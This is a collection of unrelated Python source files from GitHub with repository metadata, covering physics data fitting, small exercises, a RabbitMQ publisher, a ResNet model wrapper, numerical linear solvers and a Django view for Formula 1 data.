return a * alpha + b\n a_c, a_cov = curve_fit(a_func, alpha_fit_a, a_fit, p0=None) #, sigma=t_std_dev)#, absolute_sigma=True) # this will not work for scipy 0.13.\n a_uc = uc.correlated_values(a_c, a_cov)\n\n # find intersect of horizontals and interpolations\n x_int_up_t = (1 - t_c[1]) / t_c[0]\n x_int_lo_t = (min_a - t_c[1]) / t_c[0]\n x_int_t = np.array([x_int_up_t, x_int_lo_t])\n x_int_up_a = (1 - a_c[1]) / a_c[0]\n x_int_lo_a = (min_a - a_c[1]) / a_c[0]\n x_int_a = np.array([x_int_up_a, x_int_lo_a])\n\n # intersection of the two straight lines\n x_int = -(t_c[1] - a_c[1]) / (t_c[0] - a_c[0])\n x_int_lo = 0.5 * (x_int_lo_t + x_int_up_a)\n x_int_up = 0.5 * (x_int_up_t + x_int_lo_a)\n\n # plotting interpolation and horizontals\n fig1, ax1 = plt.subplots(1, 1)\n if not save_fig:\n fig1.suptitle(\"Band Gap Normalized, Sample: \" + sample_name + \", \" + side[j])\n # plotting the linear fit, including shading of errors\n ax1.plot(x_grid, t_real, '.', c=plot_t.get_color(), alpha=0.8, \\\n label=(r'$T_\\mathrm{' + sample_name + r', normalized}$'))\n ax1.plot(x_grid, t_func(x_grid, *t_c), '-', c=plot_t.get_color(), alpha=0.8)\n # label=(r'$T_\\mathrm{' + sample_name + r', interpolation}$'))\n ax1.plot(x_borders_t, t_borders, 'o', c=plot_t.get_color(), alpha=0.8)\n # label=(r'lower and upper minimum for interpol.'))\n ax1.plot(x_hori, x_hori*0 + 1, '--', c=plot_t.get_color(), alpha=0.8)\n # label=(r'Horizontal at $\\max(T)$'))\n textstr = \"intersects: \\n \\\n \\\\begin{eqnarray*} \\\n \\\\alpha_1 &=& %.1f^\\circ \\\\\\\\ \\\n \\\\alpha_2 &=& %.1f^\\circ \\\n \\end{eqnarray*}\"%(x_int_up_t, x_int_lo_t)\n ax1.plot(x_int_t, t_func(x_int_t, *t_c), 's', c=plot_t.get_color(), alpha=0.8) #, label=(textstr))\n ax1.plot(x_grid, a_real, '.', c=plot_a.get_color(), alpha=0.8, \\\n label=(r'$A_\\mathrm{' + sample_name + r', normalized}$'))\n ax1.plot(x_grid, a_func(x_grid, *a_c), '-', c=plot_a.get_color(), alpha=0.8)\n # label=(r'$A_\\mathrm{' + sample_name + r', interpolation}$'))\n ax1.plot(x_borders_a, a_borders, 'o', c=plot_a.get_color(), alpha=0.8)\n # label=(r'lower and upper minimum for interpol.'))\n ax1.plot(x_hori, x_hori*0 + min_a, '--', c=plot_a.get_color(), alpha=0.8)\n # label=(r'Horizontal at $\\min(A)$'))\n textstr = \"intersects: \\n \\\n \\\\begin{eqnarray*} \\\n \\\\alpha_1 &=& %.1f^\\circ \\\\\\\\ \\\n \\\\alpha_2 &=& %.1f^\\circ \\\n \\end{eqnarray*}\"%(x_int_up_t, x_int_lo_t)\n ax1.plot(x_int_a, a_func(x_int_a, *a_c), 's', c=plot_a.get_color(), alpha=0.8) #, label=(textstr))\n ax1.set_xlim(xlims[j])\n ax1.set_ylim(-0.1, 1.1)\n ax1.set_xlabel(\"angle / degrees\")\n ax1.set_ylabel(\"$U$ / V\")\n ax1.legend(loc=legend_loc[j])\n if show_fig:\n fig1.show()\n if save_fig:\n file_name = \"band_gap_result_\" + sample_name + \"_\" + side[j]\n fig1.savefig(fig_dir + file_name + \".pdf\")\n fig1.savefig(fig_dir + file_name + \".png\")\n\n\n E = ang_to_E(x_int, sample_name)\n E_lo = ang_to_E(x_int_lo, sample_name)\n E_up = ang_to_E(x_int_up, sample_name)\n dE = max(abs(E - E_lo), abs(E - E_up))\n Es[j] = uc.ufloat(E, dE)\n dEs[j] = dE\n\n f.write(\"\\t\\t%s & %.2f & %.2f & %.2f & %.2f & %.2f & $(%.2f \\pm %.2f)$\\\\\\\\ \\n\" \\\n %(sample_name, x_int, x_int_lo, x_int_up, E_lo, E_up, E, dE))\nf.write(\"\\t\\t\\hline\\n\")\nf.write(\"\\t\\end{tabular}\\n\")\nf.close()\n\ni = 0\nE_Ge = (Es[i] / dEs[i]**2 + Es[i+1] / dEs[i+1]**2) / np.sum((1 / dEs[i:i+2])**2)\ni = 2\nE_Si = (Es[i] / dEs[i]**2 + Es[i+1] / dEs[i+1]**2) / np.sum((1 / 
dEs[i:i+2])**2)\n","repo_name":"Bondzio/fp","sub_path":"semiconductor/analysis/band_gap.py","file_name":"band_gap.py","file_ext":"py","file_size_in_byte":12846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5340581906","text":"# Code that determines whether a text string is a palindrome or not\n\n# Input\ncadena = input(\"Please type your phrase:\")\n\n# Process\ncadena = cadena.lower().replace(\" \", \"\")\nreversa = cadena[::-1]\nif cadena == reversa:\n    resultado = \"La cadena es un palindromo\"\nelse:\n    resultado = \"La cadena no es un palindromo\"\n\n# Output\nprint(resultado)","repo_name":"CristianMiron0/EjerciciosConPython","sub_path":"ExAlgoritmo9.py","file_name":"ExAlgoritmo9.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"70947205587","text":"from datetime import datetime\nimport json\nimport logging\nimport random\nimport sys\nimport time\n\nimport pika\n\n\nlogging.basicConfig(level=logging.INFO)\n\nDATA_PATH = './data/data.json'\nRABBITMQ_HOST = 'metr-device-rabbitmq'\nQUEUE_NAME = 'measurements'\n\n\ndef nap() -> None:\n    \"\"\"\n    Sleep for a random amount of time between 1 and 5 seconds.\n    \"\"\"\n    a_time = random.randint(1, 5)\n    logging.info(f'Sleeping for {a_time} seconds...')\n    time.sleep(a_time)\n\n\ndef setup_rabbitmq() -> pika.BlockingConnection:\n    \"\"\"\n    Create a connection and channel to RabbitMQ.\n    \"\"\"\n    connection_params = pika.ConnectionParameters(host=RABBITMQ_HOST)\n    connection = pika.BlockingConnection(connection_params)\n    channel = connection.channel()\n    channel.queue_declare(queue=QUEUE_NAME, durable=True)\n    return connection, channel\n\n\ndef publish_message(channel, message_data):\n    \"\"\"\n    Publish a message to the RabbitMQ queue.\n    \"\"\"\n    channel.basic_publish(\n        exchange='',\n        routing_key=QUEUE_NAME,\n        body=json.dumps(message_data),\n        properties=pika.BasicProperties(delivery_mode=2),\n    )\n\n\ndef main() -> None:\n    with open(DATA_PATH) as f:\n        data = json.load(f)\n\n    connection, channel = setup_rabbitmq()\n\n    try:\n        while True:\n            for i, measurement_data in enumerate(data):\n                nap()\n                publish_message(channel, measurement_data)\n                logging.info(\n                    f'Sent measurement #{i+1} at {datetime.now().strftime(\"%H:%M:%S\")}'\n                )\n\n    except KeyboardInterrupt:\n        logging.info('Exiting...')\n        sys.exit(0)\n\n    finally:\n        connection.close()\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"CavalcanteLucas/metr","sub_path":"device/sensor.py","file_name":"sensor.py","file_ext":"py","file_size_in_byte":1714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32991882701","text":"import sys\r\ninput = sys.stdin.readline\r\ndef main():\r\n    r = []\r\n    answer = []\r\n    N,M = map(int,input().split())\r\n    for _ in range(N):\r\n        s = input().strip()\r\n        r.append(s)\r\n    \r\n    for i in range(N-7):\r\n        for j in range(M-7):\r\n            start_b = 0\r\n            start_w = 0\r\n            for k in range(i,i+8):\r\n                for l in range(j,j+8):\r\n                    if (k+l)%2 == 0:\r\n                        if r[k][l] != \"B\":\r\n                            start_b +=1\r\n                        else:\r\n                            start_w +=1\r\n                    else:\r\n                        if r[k][l] != \"W\":\r\n                            start_b +=1\r\n                        else:\r\n                            start_w +=1\r\n            answer.append(start_b)\r\n            answer.append(start_w)\r\n    print(min(answer))\r\n    \r\nmain()","repo_name":"kimdahee7/CodingTest_Python","sub_path":"백준/Silver/1018. 
체스판 다시 칠하기/체스판 다시 칠하기.py","file_name":"체스판 다시 칠하기.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1049692894","text":"from qgis.utils import iface\nfrom qgis.core import *\n\nlayer = iface.activeLayer()\nlayer.startEditing()\nfeatures = layer.getFeatures()\n\nfor feature in features:\n    # changing the attributes\n    geom = feature.geometry()\n    x = geom.asPoint().x()\n    y = geom.asPoint().y()\n    \n    feature.setAttribute('x', x)\n    feature.setAttribute('y', y)\n    \n    layer.updateFeature(feature)\n    \n    # moving according to the attributes\n    new_geom = QgsGeometry.fromPointXY(QgsPointXY(x,y))\n    layer.dataProvider().changeGeometryValues({ feature.id() : new_geom })\n\nlayer.commitChanges()\n","repo_name":"vladweat/qgis","sub_path":"script1.py","file_name":"script1.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21930971297","text":"import os\nimport paddle\n\nfrom paddle.vision.models.resnet import ResNet as PDResNet\nfrom paddle.vision.models.resnet import BottleneckBlock, BasicBlock\n\nfrom passl.models.base_model import Model\nfrom passl.nn import init\n\n__all__ = [\n    \"ResNet\",\n    \"resnet18\",\n    \"resnet34\",\n    \"resnet50\",\n    \"resnet101\",\n    \"resnet152\",\n    \"resnext50_32x4d\",\n    \"resnext50_64x4d\",\n    \"resnext101_32x4d\",\n    \"resnext101_64x4d\",\n    \"resnext152_32x4d\",\n    \"resnext152_64x4d\",\n    \"wide_resnet50_2\",\n    \"wide_resnet101_2\",\n]\n\nclass ResNet(PDResNet, Model):\n    def __init__(\n        self,\n        block,\n        depth=50,\n        width=64,\n        class_num=1000,\n        with_pool=True,\n        groups=1,\n        zero_init_residual=True,\n    ):\n        super().__init__(block, depth=depth, width=width, num_classes=class_num, with_pool=with_pool, groups=groups)\n\n        # Zero-initialize the last BN in each residual branch,\n        # so that the residual branch starts with zeros, and each residual block behaves like an identity.\n        # This improves the model by 0.2~0.3% according to https://arxiv.org/abs/1706.02677\n        if zero_init_residual:\n            for m in self.sublayers():\n                if isinstance(m, BottleneckBlock):\n                    init.constant_(m.bn3.weight, 0)\n                elif isinstance(m, BasicBlock):\n                    init.constant_(m.bn2.weight, 0)\n\n    def load_pretrained(self, path, rank=0, finetune=False):\n        if not os.path.exists(path + '.pdparams'):\n            raise ValueError(\"Model pretrain path {} does not \"\n                             \"exists.\".format(path))\n\n        state_dict = self.state_dict()\n        param_state_dict = paddle.load(path + \".pdparams\")\n\n        # for FP16 saving pretrained weight\n        for key, value in param_state_dict.items():\n            if key in param_state_dict and key in state_dict and param_state_dict[\n                    key].dtype != state_dict[key].dtype:\n                param_state_dict[key] = param_state_dict[key].astype(\n                    state_dict[key].dtype)\n\n        self.set_dict(param_state_dict)\n\n    def save(self, path, local_rank=0, rank=0):\n        paddle.save(self.state_dict(), path + \".pdparams\")\n\ndef resnet18(**kwargs):\n    \"\"\"ResNet 18-layer model from\n    `\"Deep Residual Learning for Image Recognition\" <https://arxiv.org/pdf/1512.03385.pdf>`_.\n    \"\"\"\n\n    model = ResNet(BasicBlock, 18, **kwargs)\n    return model\n\ndef resnet34(**kwargs):\n    \"\"\"ResNet 34-layer model from\n    `\"Deep Residual Learning for Image Recognition\" <https://arxiv.org/pdf/1512.03385.pdf>`_.\n    \"\"\"\n\n    model = ResNet(BasicBlock, 34, **kwargs)\n    return model\n\ndef resnet50(**kwargs):\n    \"\"\"ResNet 50-layer model from\n    `\"Deep Residual Learning for Image Recognition\" 
<https://arxiv.org/pdf/1512.03385.pdf>`_.\n \"\"\"\n\n model = ResNet(BottleneckBlock, 50, **kwargs)\n return model\n\n\ndef resnet101(**kwargs):\n \"\"\"ResNet 101-layer model from\n `\"Deep Residual Learning for Image Recognition\" <https://arxiv.org/pdf/1512.03385.pdf>`_.\n \"\"\"\n\n model = ResNet(BottleneckBlock, 101, **kwargs)\n return model\n\ndef resnet152(**kwargs):\n \"\"\"ResNet 152-layer model from\n `\"Deep Residual Learning for Image Recognition\" <https://arxiv.org/pdf/1512.03385.pdf>`_.\n \"\"\"\n\n model = ResNet(BottleneckBlock, 152, **kwargs)\n return model\n\n\ndef resnext50_32x4d(**kwargs):\n \"\"\"ResNeXt-50 32x4d model from\n `\"Aggregated Residual Transformations for Deep Neural Networks\" <https://arxiv.org/pdf/1611.05431.pdf>`_.\n \"\"\"\n\n kwargs['groups'] = 32\n kwargs['width'] = 4\n model = ResNet(BottleneckBlock, 50, **kwargs)\n return model\n\ndef resnext50_64x4d(**kwargs):\n \"\"\"ResNeXt-50 64x4d model from\n `\"Aggregated Residual Transformations for Deep Neural Networks\" <https://arxiv.org/pdf/1611.05431.pdf>`_.\n \"\"\"\n\n kwargs['groups'] = 64\n kwargs['width'] = 4\n model = ResNet(BottleneckBlock, 50, **kwargs)\n return model\n\ndef resnext101_32x4d(**kwargs):\n \"\"\"ResNeXt-101 32x4d model from\n `\"Aggregated Residual Transformations for Deep Neural Networks\" <https://arxiv.org/pdf/1611.05431.pdf>`_.\n \"\"\"\n\n kwargs['groups'] = 32\n kwargs['width'] = 4\n model = ResNet(BottleneckBlock, 101, **kwargs)\n return model\n\ndef resnext101_64x4d(**kwargs):\n \"\"\"ResNeXt-101 64x4d model from\n `\"Aggregated Residual Transformations for Deep Neural Networks\" <https://arxiv.org/pdf/1611.05431.pdf>`_.\n \"\"\"\n\n kwargs['groups'] = 64\n kwargs['width'] = 4\n model = ResNet(BottleneckBlock, 101, **kwargs)\n return model\n\n\ndef resnext152_32x4d(**kwargs):\n \"\"\"ResNeXt-152 32x4d model from\n `\"Aggregated Residual Transformations for Deep Neural Networks\" <https://arxiv.org/pdf/1611.05431.pdf>`_.\n \"\"\"\n\n kwargs['groups'] = 32\n kwargs['width'] = 4\n model = ResNet(BottleneckBlock, 152, **kwargs)\n return model\n\ndef resnext152_64x4d(**kwargs):\n \"\"\"ResNeXt-152 64x4d model from\n `\"Aggregated Residual Transformations for Deep Neural Networks\" <https://arxiv.org/pdf/1611.05431.pdf>`_.\n \"\"\"\n\n kwargs['groups'] = 64\n kwargs['width'] = 4\n model = ResNet(BottleneckBlock, 152, **kwargs)\n return model\n\ndef wide_resnet50_2(**kwargs):\n \"\"\"Wide ResNet-50-2 model from\n `\"Wide Residual Networks\" <https://arxiv.org/pdf/1605.07146.pdf>`_.\n \"\"\"\n\n kwargs['width'] = 64 * 2\n model = ResNet(BottleneckBlock, 50, **kwargs)\n return model\n\ndef wide_resnet101_2(**kwargs):\n \"\"\"Wide ResNet-101-2 model from\n `\"Wide Residual Networks\" <https://arxiv.org/pdf/1605.07146.pdf>`_.\n \"\"\"\n\n kwargs['width'] = 64 * 2\n model = ResNet(BottleneckBlock, 101, **kwargs)\n return model\n","repo_name":"PaddlePaddle/PASSL","sub_path":"passl/models/resnet.py","file_name":"resnet.py","file_ext":"py","file_size_in_byte":5688,"program_lang":"python","lang":"en","doc_type":"code","stars":248,"dataset":"github-code","pt":"48"} +{"seq_id":"17766735558","text":"import http.server\nimport socketserver\n\nPORT = 8000\n\nclass MyHttpRequestHandler(http.server.SimpleHTTPRequestHandler):\n def do_GET(self):\n if self.path == '/a':\n self.send_response(200)\n self.send_header('Content-type', 'text/html')\n self.end_headers()\n message = \"a\"\n self.wfile.write(bytes(message, \"utf8\"))\n return\n elif self.path == '/b':\n self.send_response(200)\n 
self.send_header('Content-type', 'text/html')\n            self.end_headers()\n            message = \"b\"\n            self.wfile.write(bytes(message, \"utf8\"))\n            return\n        else:\n            http.server.SimpleHTTPRequestHandler.do_GET(self)\n\nHandler = MyHttpRequestHandler\n\nwith socketserver.TCPServer((\"\", PORT), Handler) as httpd:\n    print(\"serving at port\", PORT)\n    httpd.serve_forever()","repo_name":"Unparalleled-Calvin/kross","sub_path":"example/simple-server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33334774454","text":"#!/usr/bin/env python\n\nimport scrollphat as sp\nimport math\nimport time\nimport sys\nfrom random import randint\n\nsp.set_rotate(False)\n\nclear = randint(0,10)\nif clear > 5:\n    for w in range(0,randint(5,20)):\n        for x in range(0,11):\n            for y in range(0,5):\n                sp.set_pixel(x,y,randint(0,1))\n        sp.set_brightness(128)\n        sp.update()\n        time.sleep(0.01)\n    sp.clear()\nelse:\n    for w in range(0,randint(5,20)):\n        for x in range(0,11):\n            for y in range(0,randint(1,5)):\n                sp.set_pixel(x,y,1)\n        sp.set_brightness(128)\n        sp.update()\n        time.sleep(0.01)\n    sp.clear()\n    \n","repo_name":"alleetanner/pimoroni_pHAT_python_scripts","sub_path":"my_scrolls/crash.py","file_name":"crash.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"32365981635","text":"# importing cv2\nimport cv2\n\n# path\nimport numpy\n\npath = '.\\imgs\\circuloverde.png'\n\n# Using cv2.imread() method\nimg = cv2.imread(path)\n\n# Displaying the image\ncv2.imshow('image', img)\ncv2.waitKey(0)\nhsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\nprint(hsv)\nlower_range = numpy.array([36, 0, 0])\nupper_range = numpy.array([86, 255, 255])\nmask = cv2.inRange(hsv, lower_range, upper_range)\ncv2.imshow(\"image\", mask)\ncv2.waitKey(0)","repo_name":"marcelopd20/PythonStudies","sub_path":"OpenCV/DesafioCorEForma/testes.py","file_name":"testes.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12633344002","text":"# EP2 - Numerical methods\n#\n# =============================================================================\n# we will solve the following linear system\n# |0 5 -1||I1| |5 |\n# |11 0 1||I2| = |14|\n# |1 -1 -1||I3| |0 |\n# =============================================================================\n\nimport numpy as np\n\n# b) Gaussian elimination method\n\nA = [[0, 5,-1],\n     [11,0, 1],\n     [1,-1,-1]]\n\nb = [5,14,0]\n\n\n# The method\ndef Gauss(A, b):\n    n = len(A)\n    \n    # building a matrix that is easier to solve\n    for i in range (len(A)):\n        A[i].append(b[i])\n    #print(A)\n    for i in range (n):\n        \n        # looking for the largest element in the column\n        maiEl = abs(A[i][i])\n        maiLin = i\n        for k in range (i+1, n):\n            if abs(A[k][i]) > maiEl:\n                maiEl = abs (A[k][i])\n                maiLin = k\n\n        # swapping the old row with the now largest row\n        for k in range (i, n+1):\n            tmp = A[maiLin][k]\n            A[maiLin][k] = A[i][k] \n            A[i][k] = tmp\n        \n        # zeroing out the remaining rows\n        for k in range (i+1, n):\n            c = - float(A[k][i])/float(A[i][i])\n            for j in range (i, n+1):\n                A[k][j] += c * float(A[i][j]) \n        print('i =',i,A)\n    \n    # finding the solutions\n    X = []\n    for i in range (n):\n        X.append(0)\n    for i in range(n-1, -1, -1):\n        X[i] = A[i][n]/A[i][i]\n        for k in range(n-1, -1, -1):\n            A[k][n] -= A[k][i] * X[i]\n    return 
(X)\n\n#==============================================================================\n\n# c) Solving with the Jacobi method\n\n# stopping criterion\nerro = 0.001\n\n# main function \ndef Jacobi(A, b):\n    n = len(A)\n    \n    # swapping the first two rows\n    A[0], A[1] = A[1], A[0]\n    b[0], b[1] = b[1], b[0]\n\n    def erro(A, B):\n        C = np.absolute(np.subtract(A , B))\n        return (np.amax(C))\n    \n    \n    # creating the matrices for the method \n    X = np.zeros(n)\n    novo_X = np.zeros(n)\n    D = np.diag(A)\n    J = A - np.diagflat(D)\n    \n    # loop variables\n    k = 0\n    e = 10\n    eps = 0.001\n    while eps < e:\n        X = novo_X\n        novo_X = (b - np.dot(J,X))/D\n        e = erro(X, novo_X)\n        k += 1\n        print('k= ', k , 'erro = ', e ,'\\n', 'I1= ' , novo_X[0],'\\n', 'I2= ' ,\n              novo_X[1],'\\n', 'I3= ' , novo_X[2])\n    return (X)\n    \n#==============================================================================\n\n# d) Gauss-Seidel method\n\n# stopping criterion\nerro = 0.001\n\n# main function \ndef Seidel(A, b):\n    n = len(A)\n    \n    # swapping the first two rows\n    A[0], A[1] = A[1], A[0]\n    b[0], b[1] = b[1], b[0]\n\n    # Required variables\n    X_teste = [0 for i in range(n)]\n    X = [0 for i in range(n)]\n    e = 10\n    erro = 0.001\n    k = 0\n    \n    # The method\n    while erro < e:\n        for i in range (n):\n            X_teste[i] = X[i]\n            X[i] = b[i]/A[i][i]\n            for j in range(0,i):\n                if j != i:\n                    X[i] -= A[i][j]*X[j]/A[i][i]\n            e = abs(X_teste[i]-X[i])\n        k += 1\n        print('k= ', k , 'erro = ', e ,'\\n', 'I1= ' , X_teste[0],'\\n', 'I2= ' ,\n              X_teste[1],'\\n', 'I3= ' , X_teste[2])\n    return (X)","repo_name":"gabiul/EP_numerico","sub_path":"EP2.py","file_name":"EP2.py","file_ext":"py","file_size_in_byte":3312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15655343945","text":"import pygame\n\nclass Score:\n    def __init__(self, win, setting):\n        self.setting = setting\n        self.win = win\n        self.color = (60, 60, 60)\n        self.size = 20\n        self.pen = pygame.font.SysFont(\"comicsans\", self.size)\n        self.pre_score()\n    \n    def pre_score(self):\n        \n        \n        self.text = self.pen.render(f\"SCORE : {self.setting.init_score}\", 1, self.color)\n        self.rect = self.text.get_rect()\n        self.rect.x = self.setting.WIDTH - self.size * 8\n        self.rect.y = self.size \n        \n        \n    def write(self):\n        self.win.blit(self.text, (self.rect))\n        \n    ","repo_name":"billwangust/my_pygame_spaceInvader","sub_path":"game_stats.py","file_name":"game_stats.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"10877718185","text":"#!/usr/bin/env python3\n# -*- coding:utf-8 -*-\n\n\"\"\"\n@description: check bank account\n@file_name: check_bank_account.py\n@project: my_love\n@version: 1.0\n@date: 2021/01/11 15:22\n@author: Air\n\"\"\"\n\n__author__ = 'Air'\n\nimport pandas as pd\n\n\ndef check(input_file: str, check_file: str) -> None:\n    df1 = pd.read_excel(input_file)\n    df2 = pd.read_excel(check_file)\n    number_set = set()\n    for i in range(df2.shape[0]):\n        if not pd.isna(df2.iloc[i, 1]):\n            number_set.add(str(df2.iloc[i, 2])[-5:])\n    df = pd.DataFrame(columns=['出纳提交时间', '交易时间', '凭证日期', '凭证编号', '借方发生额(支取)',\n                               '贷方发生额(收入)', '对方户名', '对方账号', '对方开户机构', '记账日期', '摘要', '备注'])\n    for i in range(df1.shape[0]):\n        number = str(df1.iloc[i, 3])[-5:]\n        if number not in number_set:\n            df = df.append(df1.iloc[i])\n    df.to_excel('out.xls', index=False, encoding='utf-8')\n    df1 = df1.drop(df.index)\n    df1.to_excel('in.xls', index=False, 
encoding='utf-8')\n","repo_name":"airmelt/my_love","sub_path":"check_bank_account.py","file_name":"check_bank_account.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24836381111","text":"import re\nfrom this import d\nfrom xmlrpc.client import TRANSPORT_ERROR\nfrom django.shortcuts import render\nfrom django.http import HttpResponse, JsonResponse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom rest_framework.decorators import api_view\nfrom rest_framework.parsers import JSONParser\n\n\nfrom django.conf import settings\n\n# Create your views here.\nimport pymongo\nimport matplotlib.pyplot as plt\nimport matplotlib as pl\nimport numpy as np\nimport pandas as pd\nimport urllib , base64\nimport io\nfrom matplotlib import style\n\n# Create your views here.\n\n@csrf_exempt\n@api_view(['GET', 'POST', 'DELETE'])\n\ndef carreras(request,year,race,driverId):\n    #cast the year value to int\n    year = int(year)\n    client= pymongo.MongoClient(settings.MONGO_URI)\n    db = client.get_database('proyecto')\n    collection = db.get_collection('races')\n    pipeline = [{\"$match\":{\n        \"year\": year\n    }\n},\n{\n    \"$lookup\":{\n        \"localField\":\"circuitId\",\n        \"from\":\"circuits\",\n        \"foreignField\":\"circuitId\",\n        \"as\":\"circuitDetail\"\n\n    }\n},\n{\"$unwind\":\"$circuitDetail\"},\n{\n    \"$project\":{\n        \"raceId\":1,\n        \"name\":1,\n        \"date\":1,\n        \"circuitId\":\"$circuitDetail.circuitId\",\n        \"circuitName\":\"$circuitDetail.name\",\n    }\n},\n{\n    \"$match\":{\"circuitName\": race}\n},\n{\n    \"$lookup\":{\n        \"localField\":\"raceId\",\n        \"from\":\"results\",\n        \"foreignField\":\"raceId\",\n        \"as\":\"circuitResult\"\n\n    }\n},\n{\"$unwind\":\"$circuitResult\"},\n{\n    \"$project\":{\n        \"raceId\":1,\n        \"name\":1,\n        \"date\":1,\n        \"circuitId\":1,\n        \"circuitName\":1,\n        \"driverId\":\"$circuitResult.driverId\",\n        \"constructorId\":\"$circuitResult.constructorId\",\n        \"number\":\"$circuitResult.number\",\n        \"positionOrder\":\"$circuitResult.position\",\n        \"points\":\"$circuitResult.points\",\n        \"laps\":\"$circuitResult.laps\",\n        \"time\":\"$circuitResult.time\",\n        \"grid\":\"$circuitResult.grid\",\n        \"fastestLap\":\"$circuitResult.fastestLap\",\n        \"statusId\":\"$circuitResult.statusId\"}\n},\n{\n    \"$lookup\":{\n        \"localField\":\"constructorId\",\n        \"from\":\"constructors\",\n        \"foreignField\":\"constructorId\",\n        \"as\":\"constructorDetail\"\n\n    }\n},\n{\"$unwind\":\"$constructorDetail\"},\n{\n    \"$project\":{\n        \"raceId\":1,\n        \"name\":1,\n        \"date\":1,\n        \"circuitId\":1,\n        \"circuitName\":1,\n        \"driverId\":1,\n        \"constructorId\":1,\n        \"number\":1,\n        \"positionOrder\":1,\n        \"points\":1,\n        \"laps\":1,\n        \"time\":1,\n        \"grid\":1,\n        \"fastestLap\":1,\n        \"statusId\":1,\n        \"constructorName\":\"$constructorDetail.name\",\n        \"constructorNationality\":\"$constructorDetail.nationality\"\n    }\n},\n{\n    \"$match\":{\"driverId\":driverId}\n},\n{\n    \"$lookup\":{\n        \"localField\":\"driverId\",\n        \"from\":\"drivers\",\n        \"foreignField\":\"driverId\",\n        \"as\":\"driverDetail\"\n\n    }\n},\n{\"$unwind\":\"$driverDetail\"},\n{\n    \"$project\":{\n        \"raceId\":1,\n        \"name\":1,\n        \"date\":1,\n        \"circuitId\":1,\n        \"circuitName\":1,\n        \"driverId\":1,\n        \"constructorId\":1,\n        \"number\":1,\n        \"positionOrder\":1,\n        \"points\":1,\n        \"laps\":1,\n        \"time\":1,\n        \"grid\":1,\n        \"fastestLap\":1,\n        \"statusId\":1,\n        \"constructorName\":1,\n        \"constructorNationality\":1,\n        \"code\":\"$driverDetail.code\",\n        \"surname\":\"$driverDetail.surname\",\n        
\"forename\":\"$driverDetail.forename\",\n        \"nationality\":\"$driverDetail.nationality\"\n    }\n},\n{\n    \"$lookup\":{\n        \"localField\":\"statusId\",\n        \"from\":\"status\",\n        \"foreignField\":\"statusId\",\n        \"as\":\"statusDetail\"\n\n    }\n},\n{\n    \"$unwind\":\"$statusDetail\"\n},\n{\n    \"$project\":{\n        \"raceId\":1,\n        \"name\":1,\n        \"date\":1,\n        \"circuitId\":1,\n        \"circuitName\":1,\n        \"driverId\":1,\n        \"constructorId\":1,\n        \"number\":1,\n        \"positionOrder\":1,\n        \"points\":1,\n        \"laps\":1,\n        \"time\":1,\n        \"grid\":1,\n        \"fastestLap\":1,\n        \"statusId\":1,\n        \"constructorName\":1,\n        \"constructorNationality\":1,\n        \"code\":1,\n        \"surname\":1,\n        \"forename\":1,\n        \"nationality\":1,\n        \"status\":\"$statusDetail.status\"}\n},\n{\n    \"$lookup\":{\n        \"from\": \"lap_times\",\n        \"let\":{\n            \"driverId\":\"$driverId\",\n            \"raceId\": \"$raceId\",\n            \"laps\":\"$fastestLap\"\n        },\n        \"pipeline\":[\n            {\n                \"$match\":{\n                    \"$expr\":{\n                        \"$and\":[\n                            {\n                                \"$eq\":[\"$driverId\",\"$$driverId\"]\n                            },\n                            {\n                                \"$eq\":[\"$raceId\",\"$$raceId\"]\n                            },\n                            {\n                                \"$eq\":[\"$lap\",\"$$laps\"]\n                            },\n                        ]\n                    }\n                }\n            }\n        ],\n        \"as\":\"fastestLapDetail\"\n    }\n},\n{\n    \"$unwind\":\"$fastestLapDetail\"\n},\n{\n    \"$project\":{\n        \"raceId\":1,\n        \"name\":1,\n        \"date\":1,\n        \"circuitId\":1,\n        \"circuitName\":1,\n        \"driverId\":1,\n        \"constructorId\":1,\n        \"number\":1,\n        \"positionOrder\":1,\n        \"points\":1,\n        \"laps\":1,\n        \"time\":1,\n        \"grid\":1,\n        \"fastestLap\":1,\n        \"statusId\":1,\n        \"constructorName\":1,\n        \"constructorNationality\":1,\n        \"code\":1,\n        \"surname\":1,\n        \"forename\":1,\n        \"nationality\":1,\n        \"status\":1,\n        \"lapFast\": \"$fastestLapDetail.time\"\n    }\n}\n\n]\n    registros=collection.aggregate(pipeline)\n    registros_df=pd.DataFrame(list(registros))\n    #concatenate the forename and surname fields of the registros_df dataframe\n    registros_df['name']=pd.concat([registros_df['forename'],registros_df['surname']],axis=1).apply(lambda x: ' '.join(x),axis=1)\n    #drop the forename and surname fields from the registros_df dataframe\n    registros_df.drop(['forename','surname'],axis=1,inplace=True)\n    registros_df.drop(['raceId','_id','circuitId','constructorId','driverId'],axis=1,inplace=True)\n    #generate the overtake field for the registros_df dataframe by subtracting grid and position\n    registros_df['overtake']=registros_df['grid']-registros_df['positionOrder']\n    \n    #replace all NaN values with 0\n    registros_df.fillna(0,inplace=True)\n    \n    \n    # render the dataframe in the template as a table\n    #emision=registros_df.to_html(classes='table table-striped 